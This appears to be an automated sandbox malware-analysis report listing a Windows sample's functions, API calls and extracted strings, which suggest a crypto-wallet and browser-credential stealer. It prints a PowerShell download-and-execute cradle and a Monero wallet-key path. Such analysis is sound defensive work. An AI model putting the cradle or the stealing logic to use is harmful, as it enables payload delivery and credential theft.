                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 060bb41f1bc3b053188d94a2f6256d249def9bc71cfa1b5fbd44d85dcfa188dc
                          • Instruction ID: c29af1f21fafcb926eb9074a1d9960c0636c50a082d014dc849ebc44f7daf929
                          • Opcode Fuzzy Hash: 060bb41f1bc3b053188d94a2f6256d249def9bc71cfa1b5fbd44d85dcfa188dc
                          • Instruction Fuzzy Hash: 6C31FEB4A0021C9BDB20CF54DC89BDDB7B4EB48704F1081E9E709B7281D7706AC58F99
                          Function 00C08100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006ED838,00000000,?,00C10E2C,00000000,?,00000000), ref: 00C08130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C08158
                          • wsprintfA.USER32 ref: 00C081AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 9d5ce6b07256e2a20029575942e6a4e62717ae38167705803c3653a249a5c796
                          • Instruction ID: be29e100c67efd2012d27a22b70401066832be5ab71f9498758ef411000d0180
                          • Opcode Fuzzy Hash: 9d5ce6b07256e2a20029575942e6a4e62717ae38167705803c3653a249a5c796
                          • Instruction Fuzzy Hash: 042127B1A44208ABDB00DFD5DC4AFAEBBB8EB44B10F104219F605BB2C0C77869058BA5
                          Function 00C083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C08426
                          • wsprintfA.USER32 ref: 00C08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08499
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,006EDA00,00000000,000F003F,?,00000400), ref: 00C084EC
                          • lstrlen.KERNEL32(?), ref: 00C08501
                          • RegQueryValueExA.ADVAPI32(00000000,006ED868,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C10B34), ref: 00C08599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C08608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C0861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 819fa3ff59ed1b743dcafa94248568032a0dc1ffb09dc55d9cc154805c5a416d
                          • Instruction ID: cc0c94a1dc0438db5f14bb3adbd8c4245d7f249c535b245b433eba1466e62156
                          • Opcode Fuzzy Hash: 819fa3ff59ed1b743dcafa94248568032a0dc1ffb09dc55d9cc154805c5a416d
                          • Instruction Fuzzy Hash: 92210A7190021CAFDB24DB54DC89FE9B7B8FB48700F04C5A8A649A6280DF716AC5CFD4
                          Function 00C07690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C076A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C076AB
                          • RegOpenKeyExA.ADVAPI32(80000002,006DBBD0,00000000,00020119,00000000), ref: 00C076DD
                          • RegQueryValueExA.ADVAPI32(00000000,006ED898,00000000,00000000,?,000000FF), ref: 00C076FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00C07708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: bffd2435b2b9e08840c6eb8e9ac4c0066deb24a73ec70ce62bc43bfe3072503e
                          • Instruction ID: 3e28e23ae316744c89877441f5a5aedf4c50e1c350c638735667fcff27ab440c
                          • Opcode Fuzzy Hash: bffd2435b2b9e08840c6eb8e9ac4c0066deb24a73ec70ce62bc43bfe3072503e
                          • Instruction Fuzzy Hash: 17012CB5A04208BFDB04DBA5DC4DFA9BBB8EB48701F144169FA45A6290D670AA88CB51
                          Function 00C07720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C0773B
                          • RegOpenKeyExA.ADVAPI32(80000002,006DBBD0,00000000,00020119,00C076B9), ref: 00C0775B
                          • RegQueryValueExA.ADVAPI32(00C076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C0777A
                          • RegCloseKey.ADVAPI32(00C076B9), ref: 00C07784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 964a1085f38bce65f87c72b9db0913f365abed6633183fb4c9149f25635eb660
                          • Instruction ID: b12104d7d3482191b88f1f39fb4e75b392cf4ecb6aeb881fb310e8f092a7cdd0
                          • Opcode Fuzzy Hash: 964a1085f38bce65f87c72b9db0913f365abed6633183fb4c9149f25635eb660
                          • Instruction Fuzzy Hash: 480144B5A4030CBFD714DBE5DC4EFAEBBB8EB44700F104169FA45A7281D6705644CB51
                          Function 00BF99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BF99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BF9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00BF9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00BF148F,00000000), ref: 00BF9A5A
                          • LocalFree.KERNEL32(00BF148F), ref: 00BF9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00BF9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c120d4ffd09f59ff7e78a5d7b0c5e2d2a9f69a04767255e32f09cb8416b858dd
                          • Instruction ID: 86456ce75b87ce648d6986ee8ee1cbbefe57a8652207d8de031c8ca2f424d1ad
                          • Opcode Fuzzy Hash: c120d4ffd09f59ff7e78a5d7b0c5e2d2a9f69a04767255e32f09cb8416b858dd
                          • Instruction Fuzzy Hash: 9B31EB74A0020DEFDB14CF95D989BAE7BF5FF48350F108198E911A7290D774A985CFA1
                          Function 00C04780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,006EDD60), ref: 00C047DB
                            • Part of subcall function 00C08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04801
                          • lstrcat.KERNEL32(?,?), ref: 00C04820
                          • lstrcat.KERNEL32(?,?), ref: 00C04834
                          • lstrcat.KERNEL32(?,006DB310), ref: 00C04847
                          • lstrcat.KERNEL32(?,?), ref: 00C0485B
                          • lstrcat.KERNEL32(?,006ED558), ref: 00C0486F
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C08D90: GetFileAttributesA.KERNEL32(00000000,?,00BF1B54,?,?,00C1564C,?,?,00C10E1F), ref: 00C08D9F
                            • Part of subcall function 00C04570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C04580
                            • Part of subcall function 00C04570: RtlAllocateHeap.NTDLL(00000000), ref: 00C04587
                            • Part of subcall function 00C04570: wsprintfA.USER32 ref: 00C045A6
                            • Part of subcall function 00C04570: FindFirstFileA.KERNEL32(?,?), ref: 00C045BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: fdedcfad42e9e197cc6843a46c954ac3eac37a28933d692f6843b92ff04badc6
                          • Instruction ID: 3668b8c1e7c69617d1007c6337f9ea8db2b16e0044d689edb130706ea731da7f
                          • Opcode Fuzzy Hash: fdedcfad42e9e197cc6843a46c954ac3eac37a28933d692f6843b92ff04badc6
                          • Instruction Fuzzy Hash: 303162B290020CABCB14FBA0DC8AEE9777CAB58700F444599B395A60C1EE75D7CDDB91
                          Function 00C02C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C02D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C02CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C02D04
                          • ')", xrefs: 00C02CB3
                          • <, xrefs: 00C02D39
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: ef0588c7e4876d0a7d91f90080964902bfff989e40b67762fdbe82da7891d7d6
                          • Instruction ID: a9db8b8188d3ff26d2b781a16d508eb71c5829602b90244fa49e74f146d7cc0c
                          • Opcode Fuzzy Hash: ef0588c7e4876d0a7d91f90080964902bfff989e40b67762fdbe82da7891d7d6
                          • Instruction Fuzzy Hash: 4F41DB71D103089ADB14FBA1C896FEDBB74AF10700F508129F156AA1D1EF746A8AEF91
                          Function 00BF9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00BF9F41
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 6c8ac7ee0986a33675a5ffa6685a6406952682496f22a789117070893c626dcc
                          • Instruction ID: 60cc74bc403e3d9d9be1339d8eba9f88182dc59fddc32e567e68313276c61847
                          • Opcode Fuzzy Hash: 6c8ac7ee0986a33675a5ffa6685a6406952682496f22a789117070893c626dcc
                          • Instruction Fuzzy Hash: C6612E70A0024CDFDB28EFA4DC96FED77B5AF54300F008518FA095B191DB746A49DB52
                          Function 00C040B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,006ED678,00000000,00020119,?), ref: 00C040F4
                          • RegQueryValueExA.ADVAPI32(?,006EDC10,00000000,00000000,00000000,000000FF), ref: 00C04118
                          • RegCloseKey.ADVAPI32(?), ref: 00C04122
                          • lstrcat.KERNEL32(?,00000000), ref: 00C04147
                          • lstrcat.KERNEL32(?,006EDD90), ref: 00C0415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 2d060d7ab2d28808badfb96a4d5e2f4127ebb4f17db77d3bdb090b4ebe6f2cbc
                          • Instruction ID: fa5ba818e9d37c8542844c65488b089ab0cd80b041a9768e35970a8fcf938a91
                          • Opcode Fuzzy Hash: 2d060d7ab2d28808badfb96a4d5e2f4127ebb4f17db77d3bdb090b4ebe6f2cbc
                          • Instruction Fuzzy Hash: 9C41C6B690010CABDB14EBA0DC4AFFE777DAB88300F444958B76557181EA759BCCCB92
                          Function 00C06920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00C0696C
                          • sscanf.NTDLL ref: 00C06999
